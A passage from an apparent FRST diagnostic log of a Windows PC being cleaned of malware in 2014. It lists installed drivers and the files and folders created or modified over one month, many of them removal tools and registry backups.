R3 FLxHCIh; C:\Windows\System32\DRIVERS\FLxHCIh.sys [77040 2013-06-05] (Fresco Logic)
R3 IDSVia64; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IDSvia64.sys [525016 2014-03-26] (Symantec Corporation)
R3 irstrtdv; C:\Windows\System32\DRIVERS\irstrtdv.sys [26504 2011-06-16] (Intel Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\ENG64.SYS [126040 2014-04-20] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\EX64.SYS [2099288 2014-04-20] (Symantec Corporation)
R3 SRTSP; C:\Windows\System32\Drivers\NISx64\1503000.00C\SRTSP64.SYS [875736 2014-02-13] (Symantec Corporation)
R3 SRTSPX; C:\Windows\system32\drivers\NISx64\1503000.00C\SRTSPX64.SYS [36952 2013-09-10] (Symantec Corporation)
R3 SymDS; C:\Windows\system32\drivers\NISx64\1503000.00C\SYMDS64.SYS [493656 2013-09-10] (Symantec Corporation)
R3 SymEFA; C:\Windows\system32\drivers\NISx64\1503000.00C\SYMEFA64.SYS [1148120 2014-03-04] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2013-11-23] (Symantec Corporation)
R3 SymIRON; C:\Windows\system32\drivers\NISx64\1503000.00C\Ironx64.SYS [264280 2013-09-27] (Symantec Corporation)
R3 SymNetS; C:\Windows\System32\Drivers\NISx64\1503000.00C\SYMNETS.SYS [593112 2014-02-18] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-06-04 17:37 - 2014-06-04 17:37 - 00086552 _____ () C:\Users\Hewlett Packard\AppData\Local\GDIPFONTCACHEV1.DAT
2014-06-04 17:33 - 2014-06-04 17:33 - 00343376 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-06-04 17:33 - 2014-06-04 17:33 - 00000056 _____ () C:\Windows\setupact.log
2014-06-04 17:33 - 2014-06-04 17:33 - 00000000 _____ () C:\Windows\setuperr.log
2014-06-04 13:16 - 2014-06-04 13:16 - 00002491 _____ () C:\Users\Hewlett Packard\Desktop\Search.txt
2014-06-04 13:09 - 2014-06-04 19:19 - 00024391 _____ () C:\Users\Hewlett Packard\Desktop\FRST.txt
2014-06-04 11:50 - 2014-06-04 11:51 - 04176736 _____ (Kaspersky Lab ZAO) C:\Users\Hewlett Packard\Desktop\tdsskiller.exe
2014-06-03 22:27 - 2014-06-03 22:28 - 00001480 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_222723.reg
2014-06-03 16:07 - 2014-06-03 16:09 - 00000507 _____ () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Navigation Canceled.website
2014-06-03 15:54 - 2014-06-03 15:55 - 00001920 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_155455.reg
2014-06-03 12:23 - 2014-06-03 12:23 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (4).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (3).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (2).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (1).exe
2014-06-03 10:07 - 2014-06-03 10:07 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu.exe
2014-06-03 09:01 - 2014-06-03 09:01 - 00002332 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_090128.reg
2014-06-03 09:00 - 2014-06-03 09:00 - 00018346 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_090029.reg
2014-06-03 00:04 - 2014-06-03 01:19 - 00000000 ____D () C:\ProgramData\Yahoo!
2014-06-02 23:57 - 2014-06-02 23:58 - 00691576 _____ (Yahoo! Inc.) C:\Users\Hewlett Packard\Downloads\msgr11us.exe
2014-06-02 23:24 - 2014-06-02 23:25 - 00022858 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_232432.reg
2014-06-02 23:23 - 2014-06-02 23:23 - 00079904 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_232256.reg
2014-06-02 22:13 - 2014-06-02 22:13 - 00000021 _____ () C:\folders.log
2014-06-02 22:13 - 2014-06-02 22:13 - 00000000 ____D () C:\zoek
2014-06-02 22:03 - 2014-06-02 22:14 - 00001521 _____ () C:\zoek-results.log
2014-06-02 22:02 - 2014-06-02 22:14 - 00002957 _____ () C:\runcheck.txt
2014-06-02 21:58 - 2014-06-02 22:14 - 00000000 ____D () C:\zoek_backup
2014-06-02 21:31 - 2014-06-02 21:55 - 01285120 _____ () C:\Users\Hewlett Packard\Desktop\zoek.exe
2014-06-02 21:26 - 2014-06-02 21:27 - 00019570 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_212646.reg
2014-06-02 08:35 - 2014-06-04 09:11 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-06-02 08:35 - 2014-06-02 08:35 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-06-02 08:35 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-06-02 08:35 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-06-02 08:35 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-06-02 08:31 - 2014-06-02 08:33 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Hewlett Packard\Downloads\mbam-setup-2.0.2.1012.exe
2014-06-02 08:21 - 2014-06-02 08:24 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\AdwCleaner.exe
2014-06-02 08:14 - 2014-06-02 08:14 - 01327971 _____ () C:\Users\Hewlett Packard\Desktop\AdwCleaner.exe
2014-06-01 17:11 - 2014-06-01 17:11 - 00053780 _____ () C:\Users\Hewlett Packard\Downloads\FRST.txt
2014-05-28 14:10 - 2014-06-04 12:00 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\NCWC
2014-05-27 19:00 - 2014-05-27 19:03 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Google
2014-05-27 18:24 - 2014-05-27 18:24 - 00380416 _____ () C:\Users\Hewlett Packard\Downloads\9kx0sxi1.exe
2014-05-27 18:13 - 2014-05-27 18:13 - 00030075 _____ () C:\Users\Hewlett Packard\Downloads\dds.txt
2014-05-27 18:13 - 2014-05-27 18:13 - 00008131 _____ () C:\Users\Hewlett Packard\Downloads\attach.txt
2014-05-27 18:05 - 2014-05-27 18:05 - 00016141 _____ () C:\Users\Hewlett Packard\Downloads\hijackthis.log
2014-05-27 17:58 - 2014-05-27 17:59 - 00688992 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\dds.scr
2014-05-27 17:56 - 2014-05-27 17:56 - 00388608 _____ (Trend Micro Inc.) C:\Users\Hewlett Packard\Downloads\HijackThis.exe
2014-05-27 17:09 - 2014-05-27 17:09 - 00062571 _____ () C:\Users\Hewlett Packard\Downloads\Shortcut.txt
2014-05-27 17:06 - 2014-06-01 16:50 - 00000000 ____D () C:\Users\Hewlett Packard\Downloads\FRST-OlderVersion
2014-05-27 15:38 - 2014-06-04 19:04 - 00248380 _____ () C:\Windows\WindowsUpdate.log
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Ralph Walker\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Public\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\hedev\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\dub_cm_auto\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default User\AppData\Local\temp
2014-05-27 13:04 - 2014-05-27 13:04 - 00033698 _____ () C:\ComboFix.txt
2014-05-27 12:37 - 2011-06-26 14:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-05-27 12:37 - 2010-11-08 01:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-05-27 12:37 - 2009-04-20 12:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00098816 _____ () C:\Windows\sed.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00080412 _____ () C:\Windows\grep.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00068096 _____ () C:\Windows\zip.exe
2014-05-27 12:35 - 2014-05-27 13:05 - 00000000 ____D () C:\Qoobox
2014-05-27 12:35 - 2014-05-27 12:59 - 00000000 ____D () C:\Windows\erdnt
2014-05-27 12:28 - 2014-05-27 12:28 - 05200919 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\username123.exe
2014-05-27 12:22 - 2014-05-27 12:22 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\adwcleaner_3.211.exe
2014-05-27 09:49 - 2014-05-27 09:49 - 00007606 _____ () C:\Users\Hewlett Packard\AppData\Local\Resmon.ResmonCfg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233429.reg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233404.reg
2014-05-26 23:33 - 2014-05-26 23:33 - 00012436 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233313.reg
2014-05-26 23:31 - 2014-05-26 23:32 - 00046014 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233124.reg
2014-05-25 20:12 - 2014-05-25 20:13 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\SkyCable
2014-05-25 18:58 - 2014-06-02 23:40 - 00001969 _____ () C:\Users\Public\Desktop\Samsung Kies 3.lnk
2014-05-25 18:58 - 2014-05-25 18:58 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\SelfMV
2014-05-25 18:58 - 2014-04-02 11:18 - 00144664 _____ (MAPILab Ltd. & Add-in Express Ltd.) C:\Windows\SysWOW64\secman.dll
2014-05-25 18:46 - 2014-04-11 16:39 - 00206080 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\Windows\system32\Drivers\ssudmdm.sys
2014-05-25 18:46 - 2014-04-11 16:39 - 00110336 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\Windows\system32\Drivers\ssudbus.sys
2014-05-25 07:19 - 2014-05-25 07:19 - 00002606 _____ () C:\Users\Hewlett Packard\Downloads\Rkill.txt
2014-05-25 07:01 - 2014-05-27 17:09 - 00031358 _____ () C:\Users\Hewlett Packard\Downloads\Addition.txt
2014-05-25 06:57 - 2014-06-04 09:02 - 00000000 ____D () C:\AdwCleaner
2014-05-25 06:57 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-05-25 06:56 - 2014-06-04 19:19 - 00000000 ____D () C:\FRST
2014-05-25 06:55 - 2014-05-25 06:55 - 01940216 _____ (Bleeping Computer, LLC) C:\Users\Hewlett Packard\Downloads\rkill.exe
2014-05-25 06:48 - 2014-06-04 13:09 - 02068992 _____ (Farbar) C:\Users\Hewlett Packard\Desktop\FRST64.exe
2014-05-25 05:46 - 2014-05-27 09:29 - 00000000 ____D () C:\NPE
2014-05-25 05:44 - 2014-05-27 09:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-25 05:14 - 2014-05-25 05:14 - 00041926 _____ () C:\Users\Hewlett Packard\Documents\cc_20140525_051401.reg
2014-05-25 04:13 - 2014-05-26 10:07 - 00003702 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-23 18:58 - 2014-05-23 19:22 - 17917592 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Retirement.pptx
2014-05-23 18:57 - 2014-05-23 19:09 - 09242974 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Prospective Properties.pptx
2014-05-21 08:30 - 2014-05-21 08:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-17 03:14 - 2014-05-06 12:40 - 23544320 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-17 03:14 - 2014-05-06 12:17 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-17 03:14 - 2014-05-06 11:25 - 17382912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-17 03:14 - 2014-05-06 11:07 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-17 03:14 - 2014-05-06 11:00 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-05-17 03:14 - 2014-05-06 10:10 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-05-16 23:20 - 2014-05-16 23:20 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2014-05-15 15:04 - 2014-05-09 14:14 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-15 15:04 - 2014-05-09 14:11 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-15 15:04 - 2014-04-12 10:22 - 00155072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-05-15 15:04 - 2014-04-12 10:22 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2014-05-15 15:04 - 2014-04-12 10:19 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2014-05-15 15:04 - 2014-04-12 10:19 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2014-05-15 15:04 - 2014-04-12 10:12 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2014-05-15 15:04 - 2014-04-12 10:10 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-05-15 15:04 - 2014-03-25 10:43 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-05-15 15:04 - 2014-03-25 10:09 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-05-15 15:04 - 2014-03-04 17:47 - 05550016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-05-15 15:04 - 2014-03-04 17:44 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\wincredprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-05-15 15:04 - 2014-03-04 17:43 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\cngprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\adprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\capiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\dpapiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-05-15 15:04 - 2014-03-04 17:20 - 03969984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-05-15 15:04 - 2014-03-04 17:20 - 03914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-05-15 15:04 - 2014-03-04 17:17 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00538112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cngprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\capiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpapiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-05-15 15:04 - 2014-03-04 17:16 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-05-07 09:22 - 2014-06-04 17:33 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-05-07 09:22 - 2014-05-17 03:31 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-05 16:55 - 2014-05-05 16:55 - 00000031 _____ () C:\Users\Hewlett Packard\Desktop\dvr password.txt
2014-05-05 16:50 - 2014-05-05 16:52 - 00000000 ____D () C:\Program Files (x86)\DVRClient Plug-in
2014-05-05 16:50 - 2014-05-05 16:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVRClient Plug-in

==================== One Month Modified Files and Folders =======

2014-06-04 19:19 - 2014-06-04 13:09 - 00024391 _____ () C:\Users\Hewlett Packard\Desktop\FRST.txt
2014-06-04 19:19 - 2014-05-25 06:56 - 00000000 ____D () C:\FRST
2014-06-04 19:19 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Temp
2014-06-04 19:04 - 2014-05-27 15:38 - 00248380 _____ () C:\Windows\WindowsUpdate.log
2014-06-04 18:41 - 2013-11-25 12:31 - 00000916 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-06-04 18:29 - 2013-05-31 13:28 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-06-04 18:26 - 2013-10-31 21:39 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\Outlook Files
2014-06-04 17:40 - 2009-07-14 12:45 - 00032064 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-06-04 17:40 - 2009-07-14 12:45 - 00032064 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-06-04 17:38 - 2009-07-14 13:13 - 00783400 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-06-04 17:37 - 2014-06-04 17:37 - 00086552 _____ () C:\Users\Hewlett Packard\AppData\Local\GDIPFONTCACHEV1.DAT
2014-06-04 17:34 - 2013-06-04 13:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Dropbox
2014-06-04 17:33 - 2014-06-04 17:33 - 00343376 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-06-04 17:33 - 2014-06-04 17:33 - 00000056 _____ () C:\Windows\setupact.log
2014-06-04 17:33 - 2014-06-04 17:33 - 00000000 _____ () C:\Windows\setuperr.log
2014-06-04 17:33 - 2014-05-07 09:22 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-06-04 17:33 - 2013-11-25 12:31 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-06-04 17:33 - 2013-06-04 13:38 - 00000000 ___RD () C:\Users\Hewlett Packard\Dropbox
2014-06-04 17:33 - 2009-07-14 13:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-06-04 17:31 - 2013-09-23 13:55 - 00000000 ____D () C:\Program Files\CCleaner
2014-06-04 16:01 - 2013-05-13 14:14 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Skype
2014-06-04 15:26 - 2014-01-15 00:02 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Deployment
2014-06-04 13:16 - 2014-06-04 13:16 - 00002491 _____ () C:\Users\Hewlett Packard\Desktop\Search.txt
2014-06-04 13:09 - 2014-05-25 06:48 - 02068992 _____ (Farbar) C:\Users\Hewlett Packard\Desktop\FRST64.exe
2014-06-04 12:00 - 2014-05-28 14:10 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\NCWC
2014-06-04 11:51 - 2014-06-04 11:50 - 04176736 _____ (Kaspersky Lab ZAO) C:\Users\Hewlett Packard\Desktop\tdsskiller.exe
2014-06-04 09:36 - 2013-12-30 05:17 - 00000000 ___RD () C:\Users\Hewlett Packard\Desktop\Technical 2014
2014-06-04 09:11 - 2014-06-02 08:35 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-06-04 09:03 - 2013-08-14 18:28 - 00000372 _____ () C:\Windows\Tasks\HPCeeScheduleForHewlett Packard.job
2014-06-04 09:02 - 2014-05-25 06:57 - 00000000 ____D () C:\AdwCleaner
2014-06-04 08:52 - 2013-08-14 18:28 - 00003246 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForHewlett Packard
2014-06-04 08:51 - 2013-06-05 07:48 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-06-04 08:51 - 2013-05-08 11:19 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2014-06-03 22:28 - 2014-06-03 22:27 - 00001480 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_222723.reg
2014-06-03 16:09 - 2014-06-03 16:07 - 00000507 _____ () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Navigation Canceled.website
2014-06-03 15:55 - 2014-06-03 15:54 - 00001920 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_155455.reg
2014-06-03 12:23 - 2014-06-03 12:23 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (4).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (3).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (2).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (1).exe
2014-06-03 10:07 - 2014-06-03 10:07 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu.exe
2014-06-03 09:01 - 2014-06-03 09:01 - 00002332 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_090128.reg
2014-06-03 09:00 - 2014-06-03 09:00 - 00018346 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_090029.reg
2014-06-03 01:19 - 2014-06-03 00:04 - 00000000 ____D () C:\ProgramData\Yahoo!
2014-06-02 23:58 - 2014-06-02 23:57 - 00691576 _____ (Yahoo! Inc.) C:\Users\Hewlett Packard\Downloads\msgr11us.exe
2014-06-02 23:40 - 2014-05-25 18:58 - 00001969 _____ () C:\Users\Public\Desktop\Samsung Kies 3.lnk
2014-06-02 23:33 - 2013-11-27 11:40 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Samsung
2014-06-02 23:33 - 2013-11-27 11:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2014-06-02 23:33 - 2013-11-27 11:32 - 00000000 ____D () C:\ProgramData\Samsung
2014-06-02 23:33 - 2013-11-27 11:32 - 00000000 ____D () C:\Program Files (x86)\Samsung
2014-06-02 23:33 - 2011-11-10 08:10 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-06-02 23:25 - 2014-06-02 23:24 - 00022858 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_232432.reg
2014-06-02 23:23 - 2014-06-02 23:23 - 00079904 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_232256.reg
2014-06-02 22:14 - 2014-06-02 22:03 - 00001521 _____ () C:\zoek-results.log
2014-06-02 22:14 - 2014-06-02 22:02 - 00002957 _____ () C:\runcheck.txt
2014-06-02 22:14 - 2014-06-02 21:58 - 00000000 ____D () C:\zoek_backup
2014-06-02 22:13 - 2014-06-02 22:13 - 00000021 _____ () C:\folders.log
2014-06-02 22:13 - 2014-06-02 22:13 - 00000000 ____D () C:\zoek
2014-06-02 21:55 - 2014-06-02 21:31 - 01285120 _____ () C:\Users\Hewlett Packard\Desktop\zoek.exe
2014-06-02 21:27 - 2014-06-02 21:26 - 00019570 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_212646.reg
2014-06-02 11:17 - 2014-02-03 14:30 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Dusit Signage Package
2014-06-02 10:49 - 2009-07-14 10:38 - 00000000 ____D () C:\Users\Ralph Walker\Desktop\C
2014-06-02 08:35 - 2014-06-02 08:35 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-06-02 08:33 - 2014-06-02 08:31 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Hewlett Packard\Downloads\mbam-setup-2.0.2.1012.exe
2014-06-02 08:24 - 2014-06-02 08:21 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\AdwCleaner.exe
2014-06-02 08:14 - 2014-06-02 08:14 - 01327971 _____ () C:\Users\Hewlett Packard\Desktop\AdwCleaner.exe
2014-06-01 18:05 - 2014-02-05 15:24 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\RHI Makati Office
